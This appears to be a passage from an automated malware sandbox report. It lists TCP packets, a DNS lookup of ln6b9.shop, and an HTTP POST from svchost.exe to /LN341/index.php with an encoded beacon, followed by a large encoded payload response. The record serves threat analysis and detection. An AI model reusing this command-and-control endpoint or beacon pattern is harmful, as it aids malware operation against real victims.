                                    Aug 29, 2024 12:02:37.379681110 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.379688978 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.379713058 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.380054951 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.380069017 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.380079985 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.380090952 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.380104065 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.380110025 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.380114079 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.380120993 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.380131960 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.380141020 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.380145073 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.380155087 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.380166054 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.380170107 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.380184889 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.380192041 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.380198002 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.380203009 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.380208969 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.380218983 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.380230904 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.380238056 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.380248070 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.380259037 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.380269051 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.380269051 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.380289078 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.380290031 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.380304098 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.380315065 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.380315065 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.380326986 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.380345106 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.380363941 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.414496899 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.414535046 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.414546013 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.414558887 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.414577007 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.414589882 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.414601088 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.414613008 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.414624929 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.414643049 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.414678097 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.467775106 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.467791080 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.467808008 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.467819929 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.467830896 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.467840910 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.467842102 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.467874050 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.467886925 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.467890978 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.467904091 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.467914104 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.467925072 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.467935085 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.467953920 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.467967987 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.467988014 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.467998981 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468027115 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.468038082 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468041897 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.468053102 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468076944 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.468089104 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.468159914 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468169928 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468179941 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468190908 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468200922 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.468202114 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468214035 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468219042 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.468244076 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.468252897 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468290091 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.468334913 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468347073 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468358040 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468369007 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468379021 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468384981 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.468384981 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.468432903 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.468524933 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468535900 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468547106 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468559027 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468569994 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468578100 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.468583107 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468590975 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.468597889 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468626022 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.468635082 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.468743086 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468754053 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468763113 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468775034 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468780041 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.468786001 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468797922 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468810081 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.468831062 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.468894005 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468905926 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468915939 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468929052 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468930960 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.468945026 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468957901 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.468957901 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.468986988 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.469003916 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.469032049 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469043970 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469068050 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.469086885 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.469192982 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469204903 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469216108 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469225883 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469237089 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469235897 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.469248056 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469257116 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.469259977 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469271898 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469284058 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469291925 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.469295025 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469297886 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.469330072 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.469355106 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.469383001 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469419956 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.469487906 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469496965 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469507933 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469518900 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469522953 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.469532013 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469542027 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469547033 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.469552994 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469575882 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.469594002 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.469650984 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469662905 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469674110 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469685078 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469691038 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.469696999 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469703913 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.469736099 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.469901085 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469912052 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469922066 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469929934 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469935894 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.469942093 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469954967 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469965935 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.469969988 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469983101 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469993114 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.469997883 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.470004082 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.470012903 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.470016003 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.470026970 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.470031023 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.470038891 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.470048904 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.470057011 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.470061064 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.470087051 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.470109940 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.470191002 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.470236063 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.470295906 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.470307112 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.470316887 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.470329046 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.470333099 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.470340014 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.470350981 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.470360994 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.470392942 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.470412016 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.470424891 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.470443010 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.470448017 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.470457077 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.470474005 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.470499992 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.470499992 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.473799944 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.479001999 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.492662907 CEST4971880192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:38.497637033 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.497746944 CEST4971880192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:38.497904062 CEST4971880192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:38.497967005 CEST4971880192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:38.502635002 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.502760887 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.502764940 CEST4971880192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:38.502773046 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.502820969 CEST4971880192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:38.502861023 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.502871990 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.502911091 CEST4971880192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:38.502962112 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.503031969 CEST4971880192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:38.503096104 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.503164053 CEST4971880192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:38.503187895 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.503202915 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.503209114 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.503249884 CEST4971880192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:38.507659912 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.507671118 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.507832050 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.507842064 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.507850885 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.507862091 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.525331020 CEST4971880192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:38.530268908 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:42.497951031 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:42.498776913 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:42.498882055 CEST4971880192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:42.499056101 CEST4971880192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:42.503859997 CEST8049718172.67.128.117192.168.2.6

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Aug 29, 2024 12:02:31.695719957 CEST5009553192.168.2.61.1.1.1
                                    Aug 29, 2024 12:02:31.713378906 CEST53500951.1.1.1192.168.2.6

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Aug 29, 2024 12:02:31.695719957 CEST192.168.2.61.1.1.10xbb9eStandard query (0)ln6b9.shopA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Aug 29, 2024 12:02:31.713378906 CEST1.1.1.1192.168.2.60xbb9eNo error (0)ln6b9.shop172.67.128.117A (IP address)IN (0x0001)false
                                    Aug 29, 2024 12:02:31.713378906 CEST1.1.1.1192.168.2.60xbb9eNo error (0)ln6b9.shop104.21.2.6A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • ln6b9.shop

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.649717172.67.128.117804396C:\Windows\SysWOW64\svchost.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 29, 2024 12:02:31.797943115 CEST272OUTPOST /LN341/index.php HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                    Host: ln6b9.shop
                                    Content-Length: 109
                                    Cache-Control: no-cache
                                    Data Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 ef 26 66 99 26 66 9a 26 66 9f 26 66 9e 26 66 99 26 66 97 26 67 ea 46 13 8b 30 67 ed 45 17 8b 30 60 8b 30 66 8b 31 11 ef 26 66 96 42 70 9d 35 70 9d 3a 70 9d 32 70 9d 34 70 9d 3b
                                    Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410b&f&f&f&f&f&f&gF0gE0`0f1&fBp5p:p2p4p;
                                    Aug 29, 2024 12:02:33.484227896 CEST1236INHTTP/1.1 200 OK
                                    Date: Thu, 29 Aug 2024 10:02:33 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Powered-By: PHP/5.6.37
                                    Vary: Accept-Encoding,User-Agent
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ECym2P%2B10O2fmDdONbRkrI4EBumn5DW%2FqxDBQ%2FHj5iY4nVb6RXkPqxnGjWWl%2B%2B%2BrOlLEX458rkV4HLAdvy1Apw0okqFVHFVwV4RztEqrO%2FADtNlpMyfKXJtEBoOo"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8babb4beeae3425f-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    Data Raw: 34 34 37 31 0d 0a 3f 36 90 4f 06 dd 77 1e d7 33 21 e2 50 65 dc 4f 04 9e 48 07 c9 68 2d ed 50 03 f8 56 65 f8 50 00 e8 49 05 fc 68 39 e3 51 06 f8 60 07 e9 55 2f cf 30 07 d8 60 13 d9 49 1e c7 36 65 cb 4b 04 dd 48 3c 9b 68 37 9c 4e 24 e2 40 3a db 66 12 d6 79 1e c9 68 2f e3 42 3e dc 40 06 9e 49 11 ff 73 12 ed 57 1c e4 49 03 f8 57 07 f8 49 04 fb 68 6c e9 50 00 d6 45 1f f8 7b 10 cc 31 1b 9f 61 02 f8 76 31 e6 4d 36 ed 50 3a db 67 1d c6 33 19 ed 6c 20 f4 44 6c c4 48 3c d9 72 19 c0 6b 26 cd 7a 3a e4 4e 2f ef 49 1e d9 68 21 ed 52 65 e5 50 04 c5 37 19 c4 52 67 e2 69 10 d7 4e 2c 9a 79 18 d4 73 03 fb 74 65 e5 3f 7a cd 3d 69 c0 3d fc bb 5a 79 0b 15 48 d8 a2 5e b3 61 f2 b9 56 79 05 09 0b dc a4 5c fb 2f f1 fa 1e 65 4b 56 4b cb a7 5c a4 4f c7 5b 33 57 66 66 65 ab cb 30 9e fd 62 cb 33 ec 66 66 65 af cb 30 9e 42 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e ba 9d cb 33 5a 79 dc 6b af 7f 39 53 23 25 ca 7f 99 47 32 0d c6 b8 10 ee 70 f2 ac 41 35 0b 46 06 ce a5 5e [TRUNCATED]
                                    Data Ascii: 4471?6Ow3!PeOHh-PVePIh9Q`U/0`I6eKH<h7N$@:fyh/B>@IsWIWIhlPE{1av1M6P:g3l DlH<rk&z:N/Ih!ReP7RgiN,yste?z=i=ZyH^aVy\/eKVK\O[3Wffe0b3ffe0B3Tffe03Tffe03Tffe03Zyk9S#%G2pA5F^vVt^F9=&3Tffet;_j0UjCQ1UjS#fe2'Tffe0_gho03Tffe03TFfe03Tdfe03^ffe03Tdfe06Tfbe03Tvfe03Twfe03Tffe03Tffe03l[fe03Tvfe0
                                    Aug 29, 2024 12:02:33.484261036 CEST1236INData Raw: 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 2c e9 ae 4b 20 66 66 65 84 cf 30
                                    Data Ascii: 3Tffe03Tffe03Tffe03Tffe03Tffe03Tffe0,K ffe03T`fe03Tffe0"Sz03TFfe03Tffe03ff%0'Tffe093vfe03D030ffe?03Tffe.q23Dffe03TffetO
                                    Aug 29, 2024 12:02:33.484272957 CEST1236INData Raw: 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30
                                    Data Ascii: 3Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03
                                    Aug 29, 2024 12:02:33.484395027 CEST1236INData Raw: 9d a2 33 37 66 14 65 c0 cb 43 9e 6d 9d ad 33 20 66 c8 65 8f cb 67 9e 6b 9d a5 33 30 66 09 65 d8 cb 43 9e ac 9d eb 33 1b 66 16 65 ca cb 42 9e 63 9d bf 33 3d 66 08 65 c8 cb 10 9e 51 9d b2 33 27 66 12 65 ca cb 5d 9e 02 9d cb 33 14 66 68 65 ae cb 60
                                    Data Ascii: 37feCm3 fegk30feC3feBc3=feQ3'fe]3fhe`p30feDT3&fe_l3efVe,3bfTe,3affe035feYn3fe_3pfbedp3:feQv3;fe0{7Tffe03Tffe03Tffe0:3
                                    Aug 29, 2024 12:02:33.484405994 CEST1236INData Raw: ed f1 1c 7b 11 11 12 81 a6 59 fd 70 f2 b8 5c 32 12 48 06 c0 a6 1f ee 69 f4 e4 50 31 14 12 16 80 86 59 fd 70 f2 b8 5c 32 12 32 0c c2 ae 63 ea 63 f0 bb 63 17 27 48 06 dd bf 00 8d 04 9e 9e 2e 71 62 6a 55 a5 cd 38 b5 04 9c ce 36 53 65 6e 55 a2 cd 39
                                    Data Ascii: {Yp\2HiP1Yp\22ccc'H.qbjU86SenU9MYgg`3lmOSstzB;{TjRdVNOy7>nI?QzcnR[p~3bkJxL:>'SPkN!Sc89{"H[,
                                    Aug 29, 2024 12:02:33.484416008 CEST1236INData Raw: a5 e6 00 65 4b 54 55 9e fb 1e fd 70 f1 fb 69 52 6e 4d 63 ae ce 35 99 03 9c cf 7d 64 2a 56 2f a9 c3 1b 98 03 98 ce 34 64 64 e0 5b c7 bf 44 ee 38 b2 e4 44 23 11 48 08 c6 a8 42 f1 71 f2 ad 47 7a 05 09 08 80 bb 5b f7 2d fe ae 41 20 15 49 28 c6 a8 73
                                    Data Ascii: eKTUpiRnMc5}d*V/4dd[D8D#HBqGz[-A I(sfT%':3eVHh5I2UfkA!t&Vw1sR5{]Mi:d?Z ,k{D&^5zpzbGw[sM^w?sQ8&
